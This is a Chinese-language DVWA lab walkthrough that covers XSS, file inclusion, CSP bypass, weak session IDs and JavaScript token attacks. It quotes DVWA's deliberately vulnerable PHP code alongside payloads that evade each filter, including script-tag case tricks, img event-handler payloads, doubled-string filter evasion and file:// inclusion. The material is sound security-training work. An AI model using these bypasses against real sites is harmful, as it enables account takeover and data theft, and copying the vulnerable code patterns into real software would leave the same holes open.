XSS部分
dvwa靶场adminpassword但凡出现互动的地方,都可能出现漏洞!!!!!<pre>Hello <script>alert('1')</script></pre>script标签是js语言执行用的,当js正确执行的时候,不会出现东西,js会被浏览器执行!!!!<scr<script>ipt>alert('1')</script>点住我!<img src="x" οnmοuseup=alert(1) />
<img src="x" onclick=alert(1) />
<img src="x" onmouseover=alert(1) />
<img src="x" onmousedown=alert(1) />
<img src="x" onmouseup=alert(1) />
反射性XSS
存储型XSS 留言板泽中
DOM型XSS
XSS(Reflected)
Low Security Level
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Feedback for end user
echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}
?>
<script>alert(1)</script>
Medium Reflected XSS Source
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Get input
$name = str_replace( '<script>', '', $_GET[ 'name' ] );
// Feedback for end user
echo "<pre>Hello ${name}</pre>";
}
?>
<ScriPt>alert(1)</sCRipt>
High Reflected XSS Source
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Get input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
// Feedback for end user
echo "<pre>Hello ${name}</pre>";
}
?>
<img src="x" οnerrοr="alert(1)">
Impossible Reflected XSS Source
<?php
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$name = htmlspecialchars( $_GET[ 'name' ] );
// Feedback for end user
echo "<pre>Hello ${name}</pre>";
}
// Generate Anti-CSRF token
generateSessionToken();
?>
XSS(Stored)
Low Stored XSS Source
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = stripslashes( $message );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitize name input
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
Name:admin
Message:<script>alert(1)</script>
Medium Stored XSS Source
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = str_replace( '<script>', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
先前端修改Name输入处的长度限制 或者burp抓包进行修改Name:<img src="x" οnerrοr="alert(1)">Message:admin
High Stored XSS Source
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
先前端修改Name输入处的长度限制 或者burp抓包进行修改Name:<img src="x" οnerrοr="alert(1)">Message:admin
Impossible Stored XSS Source
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = stripslashes( $message );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = stripslashes( $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$name = htmlspecialchars( $name );
// Update database
$data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
$data->bindParam( ':message', $message, PDO::PARAM_STR );
$data->bindParam( ':name', $name, PDO::PARAM_STR );
$data->execute();
}
// Generate Anti-CSRF token
generateSessionToken();
?>
文件包含部分
Low Security
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>
1.观察页面url vulnerabilities/fi/?page=include.php2.鼠标移动到file1.php之后观察左下角 可以看到fi/?page=file1.php3.fi/?page=http://www.baidu.com
Medium Security
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );
?>
vulnerabilities/fi/?page=hthttptp://www.baidu.com //双写绕过一次过滤vulnerabilities/fi/?page=..././xxx.php
High Security
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
//文件名一定要是file开头的文件 可以考虑file:///c:// 文件协议vulnerabilities/fi/?page=file:///c://phpstudy_pro
Impossible Security
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
★CSP Bypass (浏览器安全策略)
CSP Bypass (浏览器安全策略)
对xss有防护作用
content security policy 内容安全策略
只允许执行某些网站的东西,那你就到这个网站上想办法写一个js的地址
Pastebin.com - #1 paste tool since 2002! //可以用来写代码 并且支持远程包含的一个网站
(低级别)代码显示其允许来自这几个网站的东西的包含与执行
所以可以进入这些网站,然后测试一些恶意代码,网站会去包含,从而执行恶意代码
成功实现包含进入 和存储型xss很像!
(中级别)
unsafe-inline 允许使用内联资源:javascript:
xxx.com /onclick /style
nonce-source 允许特定内联模块 nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=" //这是随意的一句话然后base64编码了 其实只是说明限制而已
<script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert('haha')</script> //提交以后就可以成功弹窗
★Weak Session IDs (脆弱的session id)
有的网站用户登录之后会给一个session id作为用户的标识符
如果你知道其他人的session id,并且伪造,就有可能不通过用户名密码登录对方的帐号
把这个地方改成0 相当于可以伪装成0号用户的登录
网页绕过方法:
除非可以截获用户登录的时间 否则没办法伪造
更高级的防护,存在md5加密:
★JavaScript Attacks (js攻击)
攻击web前端安全
流程:
首先要知道token的算法是什么
看懂token的js代码 然后去推算
一些网站提交东西的时候,value值已经写死了,就是不让用户提交成功的。所以需要绕过token
一些网站点击一些东西的时候,不仅仅有提交这个按钮,还有很多隐藏的按钮,其会显示网站的token
如果token是错误的,即使提交的内容是正确的,最终的结果还是错误的。
在控制台输入 md5(rot3("success")); 得到token
源代码,需要知道具体的token的算法是怎样的 --->先进性rot13加密 在进行md5加密
medium级别:
XXsuccessXX
XXsseccusXX --->翻转得到最后的结果
high
此时js代码已经被各种加密了
解密特征混淆算法的网站: